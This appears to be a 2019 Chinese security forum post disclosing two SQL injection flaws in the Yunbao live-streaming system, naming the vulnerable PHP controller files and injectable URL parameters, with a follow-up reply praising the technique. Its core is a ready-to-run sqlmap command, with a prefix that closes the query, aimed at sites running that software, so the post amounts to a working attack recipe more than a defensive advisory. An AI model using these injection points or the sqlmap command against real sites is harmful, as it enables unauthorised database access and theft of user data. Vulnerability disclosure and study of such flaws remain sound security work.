90_ 发表于 2019-7-4 11:18:32

云豹直播系统两处注入漏洞

本帖最后由 90_ 于 2019-7-10 10:33 编辑

注入一:
文件位置:
/application/Home/Controller/PlaybackController.class.php

https://www.hedysx.com/wp-content/uploads/2019/07/1dc6f00cbdb7a6745e1304087dda9413101ac257-1024x658.png

注入链接:

http://www.hedysx.com/index.php?g=Home&m=Playback&touid=1、
注入二:
文件位置:
/application/Appapi/Controller/VideoController.class.php

https://www.hedysx.com/wp-content/uploads/2019/07/6dd99b16d154032095b3da5edec1232e5503286d-1024x1006.png

注入链接:

http://www.hedysx.com/index.php?g=Appapi&m=Video&videoid=1

注意闭合问题:sqlmap -u 'http://www.xxxxxx.cn/index.php?g=Appapi&m=Video&videoid=1*' --prefix "1)" --force-ssl -v3

danko 发表于 2019-7-9 01:44:13

啧 学到了 这个姿势还真厉害:lol
页: [1]
查看完整版本: 云豹直播系统两处注入漏洞